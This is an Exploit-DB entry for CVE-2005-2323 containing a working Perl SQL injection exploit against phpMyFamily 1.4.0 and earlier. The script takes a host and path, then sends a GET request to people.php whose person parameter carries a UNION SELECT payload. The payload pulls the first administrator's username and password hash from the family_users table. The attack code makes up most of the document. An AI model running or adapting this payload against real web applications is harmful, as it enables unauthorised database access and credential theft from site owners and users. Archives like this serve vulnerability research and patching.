phpMyFamily <= 1.4.0 - SQL Injection Exploit

2005-03-27T00:00:00
ID EDB-ID:1208
Type exploitdb
Reporter basher13
Modified 2005-03-27T00:00:00

Description

phpMyFamily <= 1.4.0 SQL Injection Exploit. CVE-2005-2323. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
# phpMyFamily Exploit injection
# ==============================
$banner = "phpMyFamily Exploit injection \n\n==============================
\n\nINFGPG-Hacking&Security Research";
# 
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous

use IO::Socket;
if ($#ARGV&lt;0){
print "\n$banner";
print "\n\n Usage: perl phpMyFamily.pl [host] [path] \n\n";
exit;}

$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)

$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\r\n\r\n";
$muka=IO::Socket::INET-&gt;new(Proto=&gt;"tcp",PeerAddr=&gt;"$ARGV[0]",PeerPort=&gt;"80")
or die "$ARGV[0]Connection Failed !!\n\n";

$muka -&gt; autoflush(1);
print $muka "$serius";   
print "[*]Sending exploit DONE \n\n";            
sleep(7);
close($muka);

# milw0rm.com [2005-03-27]